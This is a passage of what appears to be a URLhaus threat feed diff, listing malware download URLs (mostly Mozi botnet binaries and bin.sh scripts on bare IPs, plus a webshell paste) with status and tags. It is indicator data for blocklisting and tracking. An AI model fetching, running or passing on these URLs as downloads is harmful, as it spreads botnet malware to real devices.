listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961057","urlhaus_reference":"https://urlhaus.abuse.ch/url/961057/","url":"http://89.160.20.156:41143/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961054","urlhaus_reference":"https://urlhaus.abuse.ch/url/961054/","url":"http://89.160.20.156:51095/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:02:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961053","urlhaus_reference":"https://urlhaus.abuse.ch/url/961053/","url":"http://89.160.20.156:36558/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961050","urlhaus_reference":"https://urlhaus.abuse.ch/url/961050/","url":"http://89.160.20.156:47548/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961051","urlhaus_reference":"https://urlhaus.abuse.ch/url/961051/","url":"http://89.160.20.156:35796/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961052","urlhaus_reference":"https://urlhaus.abuse.ch/url/961052/","url":"http://89.160.20.156:42765/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961048","urlhaus_reference":"https://urlhaus.abuse.ch/url/961048/","url":"http://89.160.20.156:37388/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961049","urlhaus_reference":"https://urlhaus.abuse.ch/url/961049/","url":"http://89.160.20.156:56849/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961047","urlhaus_reference":"https://urlhaus.abuse.ch/url/961047/","url":"http://89.160.20.156:35574/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961046","urlhaus_reference":"https://urlhaus.abuse.ch/url/961046/","url":"http://89.160.20.156:46947/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961043","urlhaus_reference":"https://urlhaus.abuse.ch/url/961043/","url":"http://89.160.20.156:34452/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961044","urlhaus_reference":"https://urlhaus.abuse.ch/url/961044/","url":"http://89.160.20.156:33017/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961045","urlhaus_reference":"https://urlhaus.abuse.ch/url/961045/","url":"http://89.160.20.156:55061/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961040","urlhaus_reference":"https://urlhaus.abuse.ch/url/961040/","url":"http://89.160.20.156:50046/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961041","urlhaus_reference":"https://urlhaus.abuse.ch/url/961041/","url":"http://89.160.20.156:51960/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961042","urlhaus_reference":"https://urlhaus.abuse.ch/url/961042/","url":"http://89.160.20.156:42372/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961039","urlhaus_reference":"https://urlhaus.abuse.ch/url/961039/","url":"http://89.160.20.156:51592/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961038","urlhaus_reference":"https://urlhaus.abuse.ch/url/961038/","url":"http://89.160.20.156:35585/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961035","urlhaus_reference":"https://urlhaus.abuse.ch/url/961035/","url":"http://89.160.20.156:38398/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961036","urlhaus_reference":"https://urlhaus.abuse.ch/url/961036/","url":"http://89.160.20.156:59880/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961037","urlhaus_reference":"https://urlhaus.abuse.ch/url/961037/","url":"http://89.160.20.156:39138/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961033","urlhaus_reference":"https://urlhaus.abuse.ch/url/961033/","url":"http://89.160.20.156:51095/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961034","urlhaus_reference":"https://urlhaus.abuse.ch/url/961034/","url":"http://89.160.20.156:45117/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961032","urlhaus_reference":"https://urlhaus.abuse.ch/url/961032/","url":"http://89.160.20.156:50204/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961029","urlhaus_reference":"https://urlhaus.abuse.ch/url/961029/","url":"http://89.160.20.156:45079/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961030","urlhaus_reference":"https://urlhaus.abuse.ch/url/961030/","url":"http://89.160.20.156:52238/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961031","urlhaus_reference":"https://urlhaus.abuse.ch/url/961031/","url":"http://89.160.20.156:40312/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961026","urlhaus_reference":"https://urlhaus.abuse.ch/url/961026/","url":"http://89.160.20.156:39002/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961027","urlhaus_reference":"https://urlhaus.abuse.ch/url/961027/","url":"http://89.160.20.156:50773/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961028","urlhaus_reference":"https://urlhaus.abuse.ch/url/961028/","url":"http://89.160.20.156:50050/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961024","urlhaus_reference":"https://urlhaus.abuse.ch/url/961024/","url":"http://89.160.20.156:60081/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961025","urlhaus_reference":"https://urlhaus.abuse.ch/url/961025/","url":"http://89.160.20.156:58177/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961023","urlhaus_reference":"https://urlhaus.abuse.ch/url/961023/","url":"http://89.160.20.156:38589/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961022","urlhaus_reference":"https://urlhaus.abuse.ch/url/961022/","url":"http://89.160.20.156:39229/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:35:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961021","urlhaus_reference":"https://urlhaus.abuse.ch/url/961021/","url":"http://89.160.20.156:53595/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961018","urlhaus_reference":"https://urlhaus.abuse.ch/url/961018/","url":"http://89.160.20.156:57279/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961019","urlhaus_reference":"https://urlhaus.abuse.ch/url/961019/","url":"http://89.160.20.156:49019/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961020","urlhaus_reference":"https://urlhaus.abuse.ch/url/961020/","url":"http://89.160.20.156:48558/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961017","urlhaus_reference":"https://urlhaus.abuse.ch/url/961017/","url":"http://89.160.20.156:58913/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961016","urlhaus_reference":"https://urlhaus.abuse.ch/url/961016/","url":"http://89.160.20.156:49608/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961013","urlhaus_reference":"https://urlhaus.abuse.ch/url/961013/","url":"http://89.160.20.156:41143/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961014","urlhaus_reference":"https://urlhaus.abuse.ch/url/961014/","url":"http://89.160.20.156:42129/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961015","urlhaus_reference":"https://urlhaus.abuse.ch/url/961015/","url":"http://89.160.20.156:47403/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961011","urlhaus_reference":"https://urlhaus.abuse.ch/url/961011/","url":"http://89.160.20.156:60187/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961012","urlhaus_reference":"https://urlhaus.abuse.ch/url/961012/","url":"http://89.160.20.156:46097/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961010","urlhaus_reference":"https://urlhaus.abuse.ch/url/961010/","url":"http://89.160.20.156:50771/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:31:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} {"id":"961009","urlhaus_reference":"https://urlhaus.abuse.ch/url/961009/","url":"https://pastebin.com/raw/00aUJCLx","url_status":"offline","host":"pastebin.com","date_added":"2021-01-14 16:29:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"pmelson","larted":"false","tags":["ASPXShell","webshell"]} -{"id":"961008","urlhaus_reference":"https://urlhaus.abuse.ch/url/961008/","url":"http://115.56.31.76:45117/bin.sh","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:25:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961007","urlhaus_reference":"https://urlhaus.abuse.ch/url/961007/","url":"http://49.68.80.149:41485/Mozi.a","url_status":"online","host":"49.68.80.149","date_added":"2021-01-14 16:22:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961006","urlhaus_reference":"https://urlhaus.abuse.ch/url/961006/","url":"http://61.52.164.52:43851/Mozi.m","url_status":"online","host":"61.52.164.52","date_added":"2021-01-14 16:22:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961005","urlhaus_reference":"https://urlhaus.abuse.ch/url/961005/","url":"http://59.95.174.179:37095/Mozi.m","url_status":"offline","host":"59.95.174.179","date_added":"2021-01-14 16:22:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961004","urlhaus_reference":"https://urlhaus.abuse.ch/url/961004/","url":"http://58.249.18.32:59275/Mozi.m","url_status":"online","host":"58.249.18.32","date_added":"2021-01-14 16:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961002","urlhaus_reference":"https://urlhaus.abuse.ch/url/961002/","url":"http://83.224.148.209:46131/Mozi.m","url_status":"offline","host":"83.224.148.209","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961003","urlhaus_reference":"https://urlhaus.abuse.ch/url/961003/","url":"http://59.99.93.203:40129/Mozi.m","url_status":"offline","host":"59.99.93.203","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961000","urlhaus_reference":"https://urlhaus.abuse.ch/url/961000/","url":"http://27.204.253.74:43924/Mozi.m","url_status":"online","host":"27.204.253.74","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961001","urlhaus_reference":"https://urlhaus.abuse.ch/url/961001/","url":"http://117.247.202.55:38851/i","url_status":"offline","host":"117.247.202.55","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"960996","urlhaus_reference":"https://urlhaus.abuse.ch/url/960996/","url":"http://125.44.13.139:33008/Mozi.m","url_status":"offline","host":"125.44.13.139","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960997","urlhaus_reference":"https://urlhaus.abuse.ch/url/960997/","url":"http://125.46.165.217:60201/Mozi.m","url_status":"online","host":"125.46.165.217","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960998","urlhaus_reference":"https://urlhaus.abuse.ch/url/960998/","url":"http://182.119.116.38:41479/Mozi.m","url_status":"online","host":"182.119.116.38","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960999","urlhaus_reference":"https://urlhaus.abuse.ch/url/960999/","url":"http://42.228.41.177:52003/Mozi.m","url_status":"online","host":"42.228.41.177","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960995","urlhaus_reference":"https://urlhaus.abuse.ch/url/960995/","url":"http://117.222.170.18:39500/Mozi.m","url_status":"offline","host":"117.222.170.18","date_added":"2021-01-14 16:20:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960994","urlhaus_reference":"https://urlhaus.abuse.ch/url/960994/","url":"http://115.58.165.141:36966/Mozi.m","url_status":"online","host":"115.58.165.141","date_added":"2021-01-14 16:20:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960991","urlhaus_reference":"https://urlhaus.abuse.ch/url/960991/","url":"http://117.247.206.204:59875/Mozi.m","url_status":"offline","host":"117.247.206.204","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960992","urlhaus_reference":"https://urlhaus.abuse.ch/url/960992/","url":"http://117.222.171.220:44123/Mozi.m","url_status":"offline","host":"117.222.171.220","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960993","urlhaus_reference":"https://urlhaus.abuse.ch/url/960993/","url":"http://117.194.163.151:45224/Mozi.a","url_status":"offline","host":"117.194.163.151","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960990","urlhaus_reference":"https://urlhaus.abuse.ch/url/960990/","url":"http://115.63.143.46:43105/Mozi.m","url_status":"online","host":"115.63.143.46","date_added":"2021-01-14 16:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960984","urlhaus_reference":"https://urlhaus.abuse.ch/url/960984/","url":"http://120.85.208.36:46011/Mozi.m","url_status":"online","host":"120.85.208.36","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960985","urlhaus_reference":"https://urlhaus.abuse.ch/url/960985/","url":"http://115.58.48.66:51170/Mozi.m","url_status":"online","host":"115.58.48.66","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960986","urlhaus_reference":"https://urlhaus.abuse.ch/url/960986/","url":"http://115.50.229.51:38025/Mozi.a","url_status":"online","host":"115.50.229.51","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960987","urlhaus_reference":"https://urlhaus.abuse.ch/url/960987/","url":"http://115.55.213.63:54132/Mozi.m","url_status":"online","host":"115.55.213.63","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960988","urlhaus_reference":"https://urlhaus.abuse.ch/url/960988/","url":"http://125.43.210.102:57705/Mozi.m","url_status":"online","host":"125.43.210.102","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960989","urlhaus_reference":"https://urlhaus.abuse.ch/url/960989/","url":"http://123.14.38.9:32983/Mozi.m","url_status":"online","host":"123.14.38.9","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960983","urlhaus_reference":"https://urlhaus.abuse.ch/url/960983/","url":"http://113.254.197.92:47908/Mozi.m","url_status":"offline","host":"113.254.197.92","date_added":"2021-01-14 16:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960982","urlhaus_reference":"https://urlhaus.abuse.ch/url/960982/","url":"http://113.89.245.89:35116/Mozi.m","url_status":"offline","host":"113.89.245.89","date_added":"2021-01-14 16:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960978","urlhaus_reference":"https://urlhaus.abuse.ch/url/960978/","url":"http://115.50.159.25:38070/Mozi.m","url_status":"online","host":"115.50.159.25","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960979","urlhaus_reference":"https://urlhaus.abuse.ch/url/960979/","url":"http://112.252.130.226:53399/Mozi.m","url_status":"online","host":"112.252.130.226","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960980","urlhaus_reference":"https://urlhaus.abuse.ch/url/960980/","url":"http://112.30.4.60:39529/Mozi.m","url_status":"online","host":"112.30.4.60","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960981","urlhaus_reference":"https://urlhaus.abuse.ch/url/960981/","url":"http://112.234.156.209:33465/Mozi.m","url_status":"offline","host":"112.234.156.209","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960977","urlhaus_reference":"https://urlhaus.abuse.ch/url/960977/","url":"http://59.99.44.18:59085/Mozi.m","url_status":"offline","host":"59.99.44.18","date_added":"2021-01-14 16:16:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} -{"id":"960976","urlhaus_reference":"https://urlhaus.abuse.ch/url/960976/","url":"http://59.58.148.90:33799/i","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 16:09:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"960972","urlhaus_reference":"https://urlhaus.abuse.ch/url/960972/","url":"http://59.99.142.249:40430/Mozi.m","url_status":"offline","host":"59.99.142.249","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960973","urlhaus_reference":"https://urlhaus.abuse.ch/url/960973/","url":"http://59.99.47.139:43006/Mozi.m","url_status":"offline","host":"59.99.47.139","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960974","urlhaus_reference":"https://urlhaus.abuse.ch/url/960974/","url":"http://61.157.50.58:33385/Mozi.m","url_status":"online","host":"61.157.50.58","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 